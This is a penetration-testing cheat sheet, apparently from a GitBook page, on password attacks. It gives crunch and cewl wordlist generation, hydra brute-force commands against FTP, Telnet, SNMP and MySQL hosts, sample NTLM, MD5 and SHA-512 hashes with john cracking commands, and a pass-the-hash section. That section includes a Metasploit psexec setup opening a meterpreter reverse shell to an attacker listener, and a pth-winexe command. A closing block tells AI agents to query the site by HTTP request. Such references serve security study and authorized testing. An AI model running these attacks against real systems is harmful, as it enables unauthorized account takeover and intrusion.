# Password Attacks ### Passwords Generation #### Custom ```bash # Basic Syntax crunch {min} {max} {characters} -o {outputFile} crunch 4 6 0123456789ABCDEF -o crunch1.txt crunch 6 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch2.txt # Generate Specific Passwords , => upper @ => lower ^ => special char % => number Crunch 8 8 -t ,@@@@^%% ``` #### Profiling ```bash cewl -d 1 -m 5 --with-numbers -v -w passcewl.txt https://www.google.com ``` ### Online Attack ```bash # FTP hydra -V -L users.txt -P pass.txt -t 20 192.168.1.104 ftp hydra -V -L users.txt -e nsr -t 20 192.168.100.31 ftp hydra -V -L users.txt -P pass.txt -e nsr -t 20 192.168.100.31 ftp # Telnet hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 telnet # SNMP hydra -V -P pass.txt 192.168.1.244 snmp # MYSQL hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 mysql hydra -V -L users.txt -p "" -t 10 192.168.1.104 mysql ``` ### Offline Attack #### Hash Examples ```bash # MD5 user1:827ccb0eea8a706c4c34a16891f84e7b user2:e988532b766b8272ad0ee62911bffce4 # Windows NTLM & LM Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:3a0842db8bfe9eddd03f8f5017348cc8::: test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: test123:1008:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f::: student123:1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Student:1000:AAD3B435B51404EEAAD3B435B51404EE:EAB4556003A83E179A149CE6583E097F::: test1234:1001:aad3b435b51404eeaad3b435b51404ee:3b1b47e42e0463276e3ded6cef349f93::: # Linux Hash SHA-512 root:$6$.M0YwYN9$1grnLORHHShGJ5CnNS7gjMYAwPs7sDRdeMJ7HEUeuvgKEBdJ5VGYk866IRDHQE0bM.ou0qlGQhPpCzq46emjL0:17996:0:99999:7::: test:$6$.Nyrlw0pwMxGTBwI$gQ4jC3D8v7ubCDuAIGsjGqmxLP2/0bC.3FFK2FDDTrZGLa3A7WRBPAHSD5gvz.IZ2wgtAijtiQ3r8hriTG79/.:18003:0:99999:7::: ``` #### Hash Cracking ```bash # Linux Hash Formats john --format=md5crypt hashes.txt # md5 $1 john --format=sha256crypt hashes.txt # sha-256 $5 john --format=sha512crypt hashes.txt # sha-512 $6 # Windows Hash Formats john --format=LM hashes.txt #LM john --format=NT hashes.txt #NT # Normal md5 John --format=raw-MD5 hashes.txt # Crack using custom wordlist john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-MD5 hashes.txt ``` ### Pass The Hash ```bash # Metasploit msfconsole > use exploit/windows/smb/psexec > set RHOST 192.168.57.131 > set SMBUser administrator > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c > set payload windows/meterpreter/reverse_tcp > set LHOST 192.168.57.133 > set LPORT 4444 > exploit # PTH pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hsaad.gitbook.io/x/penetration-testing/password-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.